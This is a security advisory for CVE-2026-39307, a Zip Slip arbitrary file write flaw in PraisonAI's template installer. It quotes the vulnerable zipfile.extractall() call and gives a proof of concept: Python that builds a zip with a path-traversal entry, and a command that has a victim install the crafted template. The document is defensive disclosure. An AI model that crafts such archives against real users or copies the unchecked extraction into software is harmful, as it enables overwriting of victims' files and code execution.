CVE-2026-39307

The PraisonAI templates installation feature is vulnerable to a "Zip Slip" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's zipfile.extractall() without verifying if the files within the archive resolve outside of the intended extraction directory. 

Details

Location: src/praisonai/praisonai/cli/features/templates.py (Line 852)

Vulnerable Code snippet:

zip_ref.extractall(tmpdir)

During installation, the CLI downloads a ZIP archive and extracts it directly into a temporary directory using zip_ref.extractall(tmpdir). A specially crafted ZIP archive can contain file entries with relative paths (such as ../../../../tmp/evil.sh). If extracting this archive in older Python versions or environments where extraction rules aren't strict, extractall will write these files outside the target directory, allowing an attacker to overwrite arbitrary files on the victim's filesystem.

PoC

1. Generate a malicious zip payload:

import zipfile
with zipfile.ZipFile('malicious_template.zip', 'w') as z:
    # Adding a file that traverses directories
    z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip')

1. Trick a user into installing the malicious template:

praisonai templates install github:attacker/malicious_template

1. Observe the zipslippwned.txt file created in /tmp/ on the victim's machine.

Impact

This is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dotfiles, or application code, ultimately leading to system corruption or full Remote Code Execution (RCE).